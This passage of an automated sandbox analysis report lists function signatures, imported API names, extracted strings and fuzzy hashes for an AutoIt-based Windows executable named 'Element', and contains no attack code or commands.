                    • Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                    • Instruction Fuzzy Hash: 7871A436618A8296E710DF25EC547ED7320FB84F95F800032EA8E87A9ADF7CD949C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                    • String ID: .dll$.exe$.icl
                    • API String ID: 258715311-1154884017
                    • Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                    • Instruction ID: 22b72deabdcd23986c8baaa707566814ea5d70333d281ca5c7297f4d4657d36d
                    • Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                    • Instruction Fuzzy Hash: 1971A532A09BA286EB609F219C4867D76A4FB44FA6F440235DD9E87796DF3CDC44C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                    • String ID:
                    • API String ID: 2779716855-0
                    • Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                    • Instruction ID: 0af35abae289b56ffd9c06712470accbff8a84ade109f300fe0aa7522012fac7
                    • Opcode Fuzzy Hash: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                    • Instruction Fuzzy Hash: A0515636B04B9186EB14DF62EC48A6933A4FB88F9AB504175DE9E83B16DF3DD845C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                    • API String ID: 0-3931177956
                    • Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                    • Instruction ID: 27b0841e4bf4dd7384b89e09533299f038eccb96e91a6cca1f219172cbc50242
                    • Opcode Fuzzy Hash: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                    • Instruction Fuzzy Hash: D1027036B0A662C5FA589F65C99417C73A0FF88F42F054639DA8E87A95EF2CED51C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::$Name::operator+swprintf
                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                    • API String ID: 130963256-2441609178
                    • Opcode ID: 68a10bf44facf0b84ae4eb96ffe9e34ed4b53e78bd9f6bd738c2bc92d30197c4
                    • Instruction ID: a5ce8c97a7d624b6926e488f44aa5090f169d67f3b2876b87517030d3e289f5d
                    • Opcode Fuzzy Hash: 68a10bf44facf0b84ae4eb96ffe9e34ed4b53e78bd9f6bd738c2bc92d30197c4
                    • Instruction Fuzzy Hash: 87F18C32A00650B4FB14AB74C9BD3FC27A0B775748F844525CE4A6BADADA388DCBC745
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment
                    • API String ID: 0-2785691316
                    • Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                    • Instruction ID: c52d8405b5119d088009a35e2996eb3a6f608101a8a5b3321322f0448d49b122
                    • Opcode Fuzzy Hash: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                    • Instruction Fuzzy Hash: 6A516132B15A628AEB40DF21DC956BC37B0FB84F8AF404036EA4E8765ADF78D845C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    • Opcode ID: bc6cb8b7535270329f35c7015d40d1d74eab41d12f7730732c60380f60136060
                    • Instruction ID: 4ed4841fd5d9a962f3a9f33d753a1b9ed47a9b4d9650f72aee3c5d7b04845e7a
                    • Opcode Fuzzy Hash: bc6cb8b7535270329f35c7015d40d1d74eab41d12f7730732c60380f60136060
                    • Instruction Fuzzy Hash: 46F15A76B00A85BAFB10EF74E4B82EC37B5E32474CF444416EE4967B99DA34C59ACB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                    • String ID: P
                    • API String ID: 1460738036-3110715001
                    • Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                    • Instruction ID: b35421c0a8836c8e24780628c90783ae4b271fed97b5d0ce0b2cbfba1d643552
                    • Opcode Fuzzy Hash: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                    • Instruction Fuzzy Hash: 1D71E529A0969246F710DF259C582BD2772FB82F4AF544431DACE97682DFBCED45C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LoadStringwprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                    • API String ID: 3297454147-3080491070
                    • Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                    • Instruction ID: 4d07b34204343d595a29e84828ab44286fe8c0ddb852313e9471ce3b2c1ac13b
                    • Opcode Fuzzy Hash: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                    • Instruction Fuzzy Hash: 6F614261B296A292EB00DF24EC415ED6361FF84F85F800072EA9D9769ADF7DDD09C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Messagewprintf
                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                    • API String ID: 4051287042-2268648507
                    • Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                    • Instruction ID: bb0fe59ee1eab87cec1c97905534e107a7c43a2c9870261427a9c02df38fda54
                    • Opcode Fuzzy Hash: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                    • Instruction Fuzzy Hash: 43516E21B19AA291EB00EF64EC414AD6321FF80F95B801072F99DD769ADF7CDD0AC740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                    • String ID:
                    • API String ID: 1974058525-0
                    • Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                    • Instruction ID: 28b08c566ba012cc6c715eeb6b01807a0259f32f062840089341c708192dd43c
                    • Opcode Fuzzy Hash: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                    • Instruction Fuzzy Hash: F3917965B0AA6281EB649F15DC9067823A4BF84FC6F584131D98ECBB96DF3CEC448340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$ErrorLast$Heap$AllocFree
                    • String ID:
                    • API String ID: 570795689-0
                    • Opcode ID: 7ca9191cd13b9db17badb20b25dfeb4c5e022c4763dc3fa71fc307bea22fa67d
                    • Instruction ID: 323f85995a95bc167363a6e7e6e6ac25ee967a870d27ab79b4b238226781cb87
                    • Opcode Fuzzy Hash: 7ca9191cd13b9db17badb20b25dfeb4c5e022c4763dc3fa71fc307bea22fa67d
                    • Instruction Fuzzy Hash: F4417EB830021062FA68A775597D3EE22C29B747F4F580B29AE36077D6EE78C4D3C201
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                    • String ID: P
                    • API String ID: 1268354404-3110715001
                    • Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                    • Instruction ID: acb2b1a245d9fb11b4ad14b39fc8fa347c08b7f11bdbfbcb4aac19d907c86003
                    • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                    • Instruction Fuzzy Hash: F561DF35B0A6528AEB249F25DC5067927A1FB88FD9F140135ED8EC7B95DF3CE8408740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LoadStringwprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 3297454147-2391861430
                    • Opcode ID: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                    • Instruction ID: 85c8cfd63a35342863dcae0f3c549341b2db9ec2face51fb3a1c8d01d38c9690
                    • Opcode Fuzzy Hash: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                    • Instruction Fuzzy Hash: A6717122B1A6A292EB40DF65EC404ED6361FB84F95F800032EA9D87696DF7DED09C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                    • String ID: static
                    • API String ID: 3821898125-2160076837
                    • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                    • Instruction ID: c186670862070467636b0a414c7977455ea8787ee9709229a79b621b52b11fdf
                    • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                    • Instruction Fuzzy Hash: EC4131366087C186E7608F25E84475A7361FB89BA1F544275DA9D87BAACF3CD845CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    • Opcode ID: 9109b6d0126946025e8414f8d366ecfb20393bfba6ac2532a434fca34c3f25d5
                    • Instruction ID: 945abb1a6660bd7cc9a57497e91402bd63e965118a84003e37afae1be011769e
                    • Opcode Fuzzy Hash: 9109b6d0126946025e8414f8d366ecfb20393bfba6ac2532a434fca34c3f25d5
                    • Instruction Fuzzy Hash: CD716D72710A41BAFB11EF65D4742EC33B1E764B8CF804815DE0967A99EF30C69ACB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Replicator::operator[]
                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                    • API String ID: 3676697650-3207858774
                    • Opcode ID: 99605e2383526ee8012360babda3d0c6136817440d8f7d671e624bac7ee90c05
                    • Instruction ID: caddce1a4957e9cee050a00ae7d9a219c7b652f1a17c081a8be57b3429f66fca
                    • Opcode Fuzzy Hash: 99605e2383526ee8012360babda3d0c6136817440d8f7d671e624bac7ee90c05
                    • Instruction Fuzzy Hash: 04817932710A84A9FB11DF65D4B83ED33A5E7A9748F888112DE4963795EF38C98BC740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                    • API String ID: 2667193904-1575078665
                    • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                    • Instruction ID: 9ae783857b19c301205764ceb581beab64410676bfba773c76c866ff417e7b51
                    • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                    • Instruction Fuzzy Hash: EE913A22A19B9385EA509F24EC405B96364FF84F96F800232E5CDC3AA6DF7CD949C741
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                    • Instruction ID: 54558e0d1aefe4d7fe052d194a42970c7a76951d354f2c00b5edec2d61ec0b0d
                    • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                    • Instruction Fuzzy Hash: DB514961E0EAA385FA609F24EC842782695AF45F87F440175E4CDC66B3EF6DED08D340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                    • API String ID: 2943138195-1464470183
                    • Opcode ID: bf9e2ef6a4500eadfd2ca890c12d4022265b85a4c33e0d1f1b90e11ac282344a
                    • Instruction ID: 0feebd4f15d59b69c864c05f4f32a043e72159f5adc07c3bae359635d598368c
                    • Opcode Fuzzy Hash: bf9e2ef6a4500eadfd2ca890c12d4022265b85a4c33e0d1f1b90e11ac282344a
                    • Instruction Fuzzy Hash: E6518C72B10B24F9FB10EB69E8B86EC37B4B724384F500019EE0957AA8DB34C5C6CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                    • API String ID: 3215553584-2617248754
                    • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                    • Instruction ID: 7c2ccf5d6b294538c698b3310555ddd10a5397fe3bb6f765a81f7fcb7fcf78b3
                    • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                    • Instruction Fuzzy Hash: F141AE76A06B9589FB14CF25EC817AD33A4EB08B99F404136EE9C87B95DE3CD825C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleStringwprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 4007322891-4153970271
                    • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                    • Instruction ID: 654f43dedca8fb4b26ae94d5a8aa7c3c02c48fb1ef1abb51c801498ec1aaabbe
                    • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                    • Instruction Fuzzy Hash: 21318C76A28A9292EB10DF24EC415BD6360FF84F85F804072FA9D8769ADF7CD905C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
